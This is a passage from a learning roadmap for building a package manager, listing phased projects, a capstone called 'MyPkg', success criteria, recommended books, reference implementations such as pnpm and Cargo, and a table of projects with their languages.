  2. Project 2: Dependency Graph - Core data structure

Phase 2: Core Mechanics (4-6 weeks)

  1. Project 4: Registry Client - Understand the network layer
  2. Project 5: Lock File Generator - Understand reproducibility
  3. Project 6: Cellar Installer - Understand installation

Phase 3: Advanced Topics (6-8 weeks)

  1. Project 3: SAT Solver - The hard problem
  2. Project 9: Private Registry - Server-side understanding
  3. Project 7: node_modules Hoisting - npm’s complexity

Phase 4: Security & Scale (4-6 weeks)

  1. Project 11: Vulnerability Scanner - Security matters
  2. Project 8: Build Script Executor - Handle native code
  3. Project 12: Monorepo Manager - Enterprise patterns

Phase 5: Capstone (2-3 months)

  1. Project 14: Full Package Manager - Put it all together

Final Capstone: “MyPkg” - A Complete Package Manager

If you complete projects 1-13, you’ll have built all the pieces. The capstone (Project 14) is integrating them into a cohesive, usable system. Here’s what makes it real:

A working package manager needs:

  • A name and identity (logo, docs site, CLI personality)
  • A specification document (what’s valid, what’s not)
  • A registry (even if just local file-based to start)
  • Error messages that help users fix problems
  • Performance that doesn’t frustrate users
  • At least one real project using it

You’ll know you’ve succeeded when:

  • Someone else can read your spec and implement a compatible client
  • A real project can be managed entirely with your tool
  • Resolution handles diamond dependencies correctly
  • The lock file produces identical installations across machines
  • Your CLI feels as polished as npm or Cargo

This is a journey from “package managers are magic” to “I could build npm.” By the end, you’ll have a deep understanding of one of the most important pieces of modern development infrastructure.


Key Resources Summary

Essential Reading

  • “Designing Data-Intensive Applications” by Martin Kleppmann - For understanding caching, content addressing, distributed systems
  • “The Linux Programming Interface” by Michael Kerrisk - For filesystem, processes, and low-level operations
  • “Algorithms, Fourth Edition” by Sedgewick & Wayne - For graph algorithms and data structures

Reference Implementations to Study

  • pnpm - Innovative content-addressable approach
  • uv - Fast Python package manager in Rust
  • Cargo - Well-designed, readable codebase
  • Verdaccio - Private npm registry

Summary

| # | Project | Main Language |
|---|---|---|
| 1 | Semver Parser & Comparator | Rust |
| 2 | Dependency Graph Builder & Cycle Detector | Python |
| 3 | Version Constraint SAT Solver | Python |
| 4 | Package Registry Client | Go |
| 5 | Lock File Generator | Rust |
| 6 | Cellar-Style Package Installer | C |
| 7 | node_modules Hoisting Simulator | TypeScript |
| 8 | Build Script Executor | Go |
| 9 | Private Registry Server | Go |
| 10 | Virtual Environment Manager | Rust |
| 11 | Package Vulnerability Scanner | Go |
| 12 | Monorepo Workspace Manager | TypeScript |
| 13 | Binary Distribution System | Rust |
| 14 | Full Package Manager (Capstone) | Rust |